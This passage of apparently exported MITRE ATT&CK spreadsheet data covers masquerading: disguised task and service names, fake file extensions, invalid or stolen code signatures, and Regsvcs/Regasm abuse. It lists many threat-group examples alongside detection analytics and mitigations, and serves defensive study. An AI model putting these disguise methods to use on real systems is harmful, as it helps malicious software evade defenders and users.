[FIN7](https://attack.mitre.org/groups/G0046) has created a scheduled task named “AdobeFlashSync” to establish persistence.(Citation: Morphisec FIN7 June 2017)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has named the task for a reverse proxy lpupdate to appear legitimate.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) named a shellcode loader binary &lt;code&gt;svchast.exe&lt;/code&gt; to spoof the legitimate &lt;code&gt;svchost.exe&lt;/code&gt;.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020) 
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has disguised services to appear as benign software or related to operating system functions.(Citation: CISA AA20-301A Kimsuky)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a scheduled task named `SRCheck` to mask the execution of a malicious .dll.(Citation: ESET Twitter Ida Pro Nov 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has named a malicious script CacheTask.bat to mimic a legitimate task.(Citation: DFIR Phosphorus November 2021)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) renamed a malicious service &lt;code&gt;taskmgr&lt;/code&gt; to appear to be a legitimate version of Task Manager.(Citation: Bitdefender Naikon April 2021)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks to install [TrickBot](https://attack.mitre.org/software/S0266), using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf.(Citation: CrowdStrike Grim Spider May 2019) It has also used common document file names for other malware binaries.(Citation: FireEye KEGTAP SINGLEMALT October 2020)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has created a run key named &lt;code&gt;Dropbox Update Setup&lt;/code&gt; to mask a persistence mechanism for a malicious binary.(Citation: Zscaler APT31 Covid-19 October 2020)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).(Citation: ESET Attor Oct 2019)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can create a task named to appear benign.(Citation: Cybereason Bazar July 2020)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) has established persistence by creating a new service named `FAX` after deleting the legitimate service by the same name.(Citation: Minerva Labs Black Basta May 2022)(Citation: Cyble Black Basta May 2022)(Citation: Trend Micro Black Basta May 2022)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.(Citation: Cybereason Kimsuky November 2020)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.(Citation: Symantec Catchamas April 2018)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has used a task name associated with Windows SQM Consolidator.(Citation: ESET ComRAT May 2020)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) has established persistence with a scheduled task impersonating the Outlook item finder.(Citation: ESET Crutch December 2020)
DCSrv
[DCSrv](https://attack.mitre.org/software/S1033) has masqueraded its service as a legitimate svchost.exe process.(Citation: Checkpoint MosesStaff Nov 2021)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) has used `schtasks /change` to modify scheduled tasks including `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.(Citation: Mandiant APT41)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has masqueraded the svchost.exe process to exfiltrate data.(Citation: Intrinsec Egregor Nov 2020)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has installed itself as a new service with the service name `Windows Defender System Service` and display name `WinDefService`.(Citation: Binary Defense Emotes Wi-Fi Spreader)
Exaramel for Windows
The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service.(Citation: ESET TeleBots Oct 2018)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) has used a service named `WSearch` for execution.(Citation: Bitdefender FunnyDream Campaign November 2020)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as the rsyncd and dbus-inotifier services.(Citation: Fysbis Dr Web Analysis)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has impersonated systems management software to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) has created a new executable named `Software Update Check` to appear legitimate.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has been named `srvdll.dll` to appear as a legitimate service.(Citation: SentinelOne Aoqin Dragon June 2022)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has disguised itself as a known Linux process.(Citation: Unit 42 Hildegard Malware)
InnaputRAT
[InnaputRAT](https://attack.mitre.org/software/S0259) variants have attempted to appear legitimate by adding a new service named OfficeUpdateService.(Citation: ASERT InnaputRAT April 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has attempted to disguise itself by registering under a seemingly legitimate service name.(Citation: ESET InvisiMole June 2020)
IronNetInjector
[IronNetInjector](https://attack.mitre.org/software/S0581) has been disguised as a legitimate service using the name PythonUpdateSrvc.(Citation: Unit 42 IronNetInjector February 2021 )
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has pretended to be the xmlProv Network Provisioning service.(Citation: Malwarebytes Konni Aug 2021) 
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) registers as a service under the Plug-And-Play Support name.(Citation: ESET Telebots Dec 2016)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) establishes persistence by adding a new service with the display name "WMI Performance Adapter Extension" in an attempt to masquerade as a legitimate WMI service.(Citation: Symantec Orangeworm April 2018)
Machete
[Machete](https://attack.mitre.org/software/S0409) renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.(Citation: ESET Machete July 2019) 
Maze
[Maze](https://attack.mitre.org/software/S0449) operators have created scheduled tasks masquerading as "Windows Update Security", "Windows Update Security Patches", and "Google Chrome Security Update" designed to launch the ransomware.(Citation: Sophos Maze VM September 2020) 
Meteor
[Meteor](https://attack.mitre.org/software/S0688) has been disguised as the Windows Power Efficiency Diagnostics report tool.(Citation: Check Point Meteor Aug 2021)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) has created a service named "Windows Update Agent1" to appear legitimate.(Citation: Bitdefender Naikon April 2021)
Nidiran
[Nidiran](https://attack.mitre.org/software/S0118) can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.(Citation: Symantec Backdoor.Nidiran)(Citation: Microsoft SAM)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) has created a service named `WmdmPmSp` to spoof a Windows Media service.(Citation: MoustachedBouncer ESET August 2023)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses file naming conventions with associated executable locations to blend in with the macOS TimeMachine and OpenSSL services. Such as, naming a LaunchAgent plist file `com.apple.openssl.plist` which executes [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) from the user's `~/Library/OpenSSL/` folder upon user login.(Citation: Unit42 OceanLotus 2017)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.(Citation: ESET Okrum July 2019)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) has created a scheduled task named "MicrosoftEdge" to establish persistence.(Citation: ClearSky MuddyWater Nov 2018)
PingPull
[PingPull](https://attack.mitre.org/software/S1031) can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`,  and `Onedrive` to evade detection.(Citation: Unit 42 PingPull Jun 2022)
PlugX
In one instance, [menuPass](https://attack.mitre.org/groups/G0045) added [PlugX](https://attack.mitre.org/software/S0013) as a service with a display name of "Corel Writing Tools Utility."(Citation: FireEye APT10 April 2017)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) has used Windows Video Service as a name for malicious services.(Citation: Unit42 RDAT July 2020)
RTM
[RTM](https://attack.mitre.org/software/S0148) has named the scheduled task it creates "Windows Update".(Citation: Unit42 Redaman January 2019)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) has named services and scheduled tasks to appear benign including "ChromeCheck" and "googleupdate."(Citation: Bitdefender Naikon April 2021)
RawPOS
New services created by [RawPOS](https://attack.mitre.org/software/S0169) are made to appear like legitimate Windows services, with names such as "Windows Management Help Service", "Microsoft Support", and "Windows Advanced Task Manager".(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015)(Citation: Mandiant FIN5 GrrCON Oct 2016)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has named a service it establishes on victim machines as "TaskFrame" to hide its malicious purpose.(Citation: CISA MAR SLOTHFULMEDIA October 2020) 
SUGARDUMP
[SUGARDUMP](https://attack.mitre.org/software/S1042)'s scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version.(Citation: Mandiant UNC3890 Aug 2022) 
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) has named a task `RecoveryExTask` as part of its persistence activity.(Citation: HP SVCReady Jun 2022)
Seasalt
[Seasalt](https://attack.mitre.org/software/S0345) has masqueraded as a service called "SaSaut" with a display name of "System Authorization Service" in an apparent attempt to masquerade as a legitimate service.(Citation: Mandiant APT1 Appendix)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the "MaintenaceSrv" service, which misspells the word "maintenance."(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) can impersonate Windows services and antivirus products to avoid detection on compromised systems.(Citation: FOX-IT May 2016 Mofang)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has named their unit configuration file similarly to other unit files residing in the same directory, `/usr/lib/systemd/system/`, to appear benign.(Citation: Lunghi Iron Tiger Linux)
Tarrask
[Tarrask](https://attack.mitre.org/software/S1011) creates a scheduled task called “WinUpdate” to re-establish any dropped  C2 connections.(Citation: Tarrask scheduled task)
TinyTurla
[TinyTurla](https://attack.mitre.org/software/S0668) has mimicked an existing Windows service by being installed as &lt;code&gt;Windows Time Service&lt;/code&gt;.(Citation: Talos TinyTurla September 2021)
Truvasys
To establish persistence, [Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key with a value "TaskMgr" in an attempt to masquerade as the legitimate Windows Task Manager.(Citation: Microsoft Win Defender Truvasys Sep 2017)
Turian
[Turian](https://attack.mitre.org/software/S0647) can disguise as a legitimate service to blend into normal operations.(Citation: ESET BackdoorDiplomacy Jun 2021)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) has registered a service named `WerFaultSvc`, likely to spoof the legitimate Windows error reporting service.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Volgmer
Some [Volgmer](https://attack.mitre.org/software/S0180) variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)
ZxxZ
[ZxxZ](https://attack.mitre.org/software/S1013) has been disguised as a Windows security update service.(Citation: Cisco Talos Bitter Bangladesh May 2022)
build_downer
[build_downer](https://attack.mitre.org/software/S0471) has added itself to the Registry Run key as "NVIDIA" to appear legitimate.(Citation: Trend Micro Tick November 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for abnormal command execution from otherwise non-executable file types (such as `.txt` and `.jpg`). 
File Modification
Check and ensure that file headers/signature and extensions match using magic bytes detection and/or file signature validation.(Citation: Polyglot Files: a Hacker’s best friend) In Linux, the &lt;code&gt;file&lt;/code&gt; command may be used to check the file signature.(Citation: file_sig_table)
Antivirus/Antimalware
Anti-virus can be used to automatically quarantine suspicious files. 
Behavior Prevention on Endpoint
Implement security controls on the endpoint, such as a Host Intrusion Prevention System (HIPS), to identify and prevent execution of files with mismatching file signatures.
Execution Prevention
Ensure that input sanitization is performed and that files are validated properly before execution; furthermore, implement a strict allow list to ensure that only authorized file types are processed.(Citation: file_upload_attacks_pt2) Restrict and/or block execution of files where headers and extensions do not match. 
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) masqueraded executables as `.txt` files.(Citation: Dragos Crashoverride 2018)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) disguised malicious template files as JPEG files to avoid detection.(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has appended copies of the ntds.dit database with a .gif file extension.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
ANDROMEDA
[ANDROMEDA](https://attack.mitre.org/software/S1074) has been delivered through a LNK file disguised as a folder.(Citation: Mandiant Suspected Turla Campaign February 2023)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has been disguised as a .jpg file.(Citation: Trend Micro AvosLocker Apr 2022)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has used Microsoft Word icons to hide malicious LNK files.(Citation: Palo Alto Brute Ratel July 2022)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has disguised it's true file structure as an application bundle by adding special characters to the filename and using the icon for legitimate Word documents.(Citation: Trend Micro MacOS Backdoor November 2020)
QakBot
The [QakBot](https://attack.mitre.org/software/S0650) payload has been disguised as a PNG file and hidden within LNK files using a Microsoft File Explorer icon.(Citation: Group IB Ransomware September 2020)(Citation: Trend Micro Black Basta October 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.
Code Signing
Require signed binaries.
APT37
[APT37](https://attack.mitre.org/groups/G0067) has signed its malware with an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited.”(Citation: Securelist ScarCruft Jun 2016)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used revoked certificates to sign malware.(Citation: objective-see windtail1 dec 2018)(Citation: SANS Windshift August 2018)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.(Citation: TrendMicro Patchwork Dec 2017)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has used unverified signatures on malicious DLLs.(Citation: ESET Gelsemium June 2021)
NETWIRE
The [NETWIRE](https://attack.mitre.org/software/S0198) client has been signed by fake and invalid digital certificates.(Citation: McAfee Netwire Mar 2015)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) has used an invalid certificate in attempt to appear legitimate.(Citation: Bitdefender FunnyDream Campaign November 2020)
Regin
[Regin](https://attack.mitre.org/software/S0019) stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.(Citation: Kaspersky Regin)
WindTail
[WindTail](https://attack.mitre.org/software/S0466) has been incompletely signed with revoked certificates.(Citation: objective-see windtail1 dec 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
Monitor for API calls such as `fork()` which can be abused to masquerade or manipulate process metadata.
Process Creation
Monitor for the abnormal creation of background processes as well as processes executing from abnormal locations, such as `/dev/shm`.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. (Citation: Twitter ItsReallyNick Masquerading Update)
Note: For Windows, Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on potential Masquerading. 
File Metadata
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.
Check and ensure that file headers/signature and extensions match using magic bytes detection and/or file signature validation.(Citation: Polyglot Files: a Hacker’s best friend) In Linux, the &lt;code&gt;file&lt;/code&gt; command may be used to check the file signature.(Citation: file_sig_table)
File Modification
Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Windows Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on attempted file accesses that may be associate with Masquerading. 
Image Metadata
Collecting disk and resource filenames for binaries, comparing that the InternalName, OriginalFilename, and/or ProductName match what is expected, could provide useful leads but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball)
OS API Execution
Monitor for API calls such as `fork()` which can be abused to masquerade or manipulate process metadata.
Process Creation
Monitor for newly executed processes that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. The RECYCLER and SystemVolumeInformation directories will be present on every drive. Replace %systemroot% and %windir% with the actual paths as configured by the endpoints.
&lt;h4&gt;Analytic 1 - Suspicious Run Locations &lt;/h4&gt;
&lt;code&gt;suspicious_locations = filter process where (
 image_path == "*:\RECYCLER\*" or
 image_path == "*:\SystemVolumeInformation\*" or
 image_path == "%windir%\Tasks\*" or
 image_path == "%systemroot%\debug\*")&lt;/code&gt;
Process Metadata
Monitor for file names that are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. 
Scheduled Job Metadata
Monitor for contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.
On Windows, Event ID 4698 (Security Log - A scheduled task was created) can be used to alert on the creation of scheduled tasks and provides metadata including the task name and task content (as XML).
On Linux, auditing frameworks such as the Linux Auditing System (auditd) can be used to alert on invocations of cron, and provides the metadata included when executing the command. 
Scheduled Job Modification
Monitor for changes made to scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.
Service Creation
Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.
Service Metadata
Monitor for contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.
Antivirus/Antimalware
Anti-virus can be used to automatically quarantine suspicious files.
Behavior Prevention on Endpoint
Implement security controls on the endpoint, such as a Host Intrusion Prevention System (HIPS), to identify and prevent execution of potentially malicious files (such as those with mismatching file signatures).
Code Signing
Require signed binaries.
Execution Prevention
Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.
Restrict File and Directory Permissions
Use file system access controls to protect folders such as C:\\Windows\\System32.
User Training
Train users not to open email attachments or click unknown links (URLs). Such training fosters more secure habits within your organization and will limit many of the risks.  
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.(Citation: DFIR Conti Bazar Nov 2021)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), [AvosLocker](https://attack.mitre.org/software/S1053) was disguised using the victim company name as the filename.(Citation: Cisco Talos Avos Jun 2022)
Operation Dust Storm
For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors disguised some executables as JPG files.(Citation: Cylance Dust Storm) 
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors modified the MaoCheng dropper so its icon appeared as a Word document.(Citation: McAfee Honeybee)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) set the hostnames of their C2 infrastructure to match legitimate hostnames in the victim environment. They also used IP addresses originating from the same country as the victim for their VPN infrastructure.(Citation: FireEye SUNBURST Backdoor December 2020)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has renamed the WinRAR utility to avoid detection.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has disguised a Cobalt Strike beacon as a Flash Installer.(Citation: Cybereason Cobalt Kitty 2017)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has masked executables with document file icons including Word and Adobe PDF.(Citation: Trend Micro Tick November 2019)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has created accounts disguised as legitimate backup and service accounts as well as an email administration account.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has masqueraded staged data by using the Windows [certutil](https://attack.mitre.org/software/S0160) utility to generate fake Base64 encoded certificates with the input file.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has disguised its C2 addresses as the websites of shopping malls, governments, universities, and others.(Citation: KISA Operation Muzabi)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used several different security software icons to disguise executables.(Citation: MalwareBytes LazyScripter Feb 2021) 
Nomadic Octopus
[Nomadic Octopus](https://attack.mitre.org/groups/G0133) attempted to make [Octopus](https://attack.mitre.org/software/S0340) appear as a  Telegram Messenger with a Russian interface.(Citation: Securelist Octopus Oct 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used .doc file extensions to mask malicious executables.(Citation: Check Point APT34 April 2021)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has renamed rar.exe to avoid detection.(Citation: Twitter ItsReallyNick Platinum Masquerade)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has masked malware DLLs as dat and jpg files.(Citation: Unit 42 TA551 Jan 2021)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has disguised their scripts with docker-related file names.(Citation: Cisco Talos Intelligence Group)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used icons mimicking MS Office files to mask malicious executables.(Citation: objective-see windtail1 dec 2018) [Windshift](https://attack.mitre.org/groups/G0112) has also attempted to hide executables by changing the file extension to ".scr" to mimic Windows screensavers.(Citation: BlackBerry Bahamut)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has spoofed legitimate applications in phishing lures and changed file extensions to conceal  installation of malware.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used [esentutl](https://attack.mitre.org/software/S0404) to change file extensions to their true type that were masquerading as .txt files.(Citation: FireEye APT10 Sept 2018) 
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can disguise JavaScript files as PDFs.(Citation: Malwarebytes Kimsuky June 2021)
Bisonal
 [Bisonal](https://attack.mitre.org/software/S0268) dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.(Citation: Talos Bisonal Mar 2020) 
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) has the ability to mask malicious data strings as PDF files.(Citation: MSTIC Nobelium Toolset May 2021)
Dacls
The [Dacls](https://attack.mitre.org/software/S0497) Mach-O binary has been disguised as a .nib file.(Citation: SentinelOne Lazarus macOS July 2020)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066)'s payload has been renamed `PowerShellInfo.exe`.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has used an icon mimicking a text file to mask a malicious executable.(Citation: Prevailion DarkWatchman 2021)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) has used folder icons for malicious files to lure victims into opening them.(Citation: MSTIC Nobelium Toolset May 2021)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.(Citation: ESET Dukes October 2019)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can download malicious files with a .tmp extension and append them with .exe prior to execution.(Citation: NTT Security Flagpro new December 2021)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can masquerade the output of C2 commands as a fake, but legitimately formatted WebP file.(Citation: MSTIC FoggyWeb September 2021)
Milan
[Milan](https://attack.mitre.org/software/S1015) has used an executable named `companycatalogue` to appear benign.(Citation: ClearSky Siamesekitten August 2021)
NativeZone
[NativeZone](https://attack.mitre.org/software/S0637) has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.(Citation: SentinelOne NobleBaron June 2021)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) drops [PsExec](https://attack.mitre.org/software/S0029) with the filename dllhost.dat.(Citation: Talos Nyetya June 2017)
PowGoop
[PowGoop](https://attack.mitre.org/software/S1046) has disguised a PowerShell script as a .dat file (goopdate.dat).(Citation: DHS CISA AA22-055A MuddyWater February 2022)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) has used a file named English.rtf to appear benign on victim hosts.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro DRBControl February 2020)
RTM
[RTM](https://attack.mitre.org/software/S0148) has been delivered as archived Windows executable files masquerading as PDF documents.(Citation: Unit42 Redaman January 2019)	
Raindrop
[Raindrop](https://attack.mitre.org/software/S0565) was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a JPG image file.(Citation: Eset Ramsay May 2020)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) can create .dll files that actually contain a Rich Text File format document.(Citation: ANSSI RYUK RANSOMWARE)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) can use a legitimate process name to hide itself.(Citation: CISA AR21-126A FIVEHANDS May 2021)
TrailBlazer
[TrailBlazer](https://attack.mitre.org/software/S0682) has used filenames that match the name of the compromised system in attempt to avoid detection.(Citation: CrowdStrike StellarParticle January 2022)
TrickBot
The [TrickBot](https://attack.mitre.org/software/S0266) downloader has used an icon to appear as a Microsoft Word document.(Citation: Cyberreason Anchor December 2019)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) has been disguised as a JPG extension to avoid detection as a malicious PE file.(Citation: Medium S2W WhisperGate January 2022)
WindTail
[WindTail](https://attack.mitre.org/software/S0466) has used icons mimicking MS Office files to mask payloads.(Citation: objective-see windtail1 dec 2018)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) builds a malicious application bundle to resemble Safari through using the Safari icon and &lt;code&gt;Info.plist&lt;/code&gt;. (Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.
Process Creation
Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity.
Disable or Remove Feature or Program
Regsvcs and Regasm may not be necessary within a given environment.
Execution Prevention
Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has dropped RegAsm.exe onto systems for performing malicious activity.(Citation: SentinelLabs Agent Tesla Aug 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.
C0015
For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used DLL files that had invalid certificates.(Citation: DFIR Conti Bazar Nov 2021)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) digitally signed their own malware to evade detection.(Citation: ESET Lazarus Jun 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature.(Citation: McAfee Honeybee)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) was able to get [SUNBURST](https://attack.mitre.org/software/S0559) signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.(Citation: FireEye SUNBURST Backdoor December 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
CopyKittens
